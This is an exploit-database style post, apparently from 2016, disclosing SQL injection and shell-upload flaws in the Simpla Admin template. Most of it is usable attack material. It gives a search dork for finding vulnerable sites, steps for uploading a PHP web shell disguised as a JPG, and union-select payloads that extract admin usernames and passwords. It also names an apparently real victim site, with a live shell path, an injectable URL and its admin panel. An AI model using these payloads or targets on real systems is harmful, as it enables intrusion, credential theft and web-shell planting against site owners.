Home / os / solaris

Simpla Admin Single-adsID SQL Injection / Shell Upload

Posted on 30 November -0001

<HTML><HEAD><TITLE>Simpla Admin Single-adsID SQL Injection / Shell Upload</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : Simpla Admin Single-adsID SQL Injection / Shell Upload # Exploit Author : xBADGIRL21 # Dork : intext:connexion "single-ads.php?ID=" or inurl:.single-ads.php?ID= # Software link : https://themeforest.net/item/simpla-admin-flexible-user-friendly-admin-skin/46073 # Category: [ Webapps ] # Tested on: [ Windows ] # Vendore : https://themeforest.net # Version : 1.02 # skype:xbadgirl21 # Date: 2016-07-07 # video Proof : https://youtu.be/Ouy8h6G9Pyo ###################### # ###################### # Shell Upload # ###################### # Description : # this upload shell exploit allow attackers to upload there shells eazy by registering in the website # then choose to Edit your info then uploading there shell as shell.jpg then to shell.php using Live HTTP Headers # path Ev!l : /common/uploaded_files/user # PoC: # 1 - choose a site and open it # 2- Register in the website # 3- upload your shell as image JPG then to PHP using Live HTTP Headers # 4- Go to : /common/uploaded_files/user/[RANDOME_NUMshell.php] ####################### # # Live Demo:http://www.labouteillealamer.fr/common/uploaded_files/user/1467918685a.php # ###################### # SQL injection # ###################### # PoC: # http://www.site.com/single-ads.php?ID=[SQLi] ###################### + test:=> http://www.site.com/single-ads.php?ID=[5830] INJECT HERE ###################### + CODES : # http://www.site.com/single-ads.php?ID=-5830 /*!11111union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -- # http://www.site.com/single-ads.php?ID=single-ads.php?ID=-5830 /*!11111union*/ select 1,2,3,/*!11111group_coNcat(AdminUserName,0x3a,AdminPassword)*/,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from lbm_admin-- + Demo: + http://www.labouteillealamer.fr/single-ads.php?ID=5830' + Admin Panel : + http://www.labouteillealamer.fr/lbmbackoffice/ ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ####################### </BODY></HTML>

 

TOP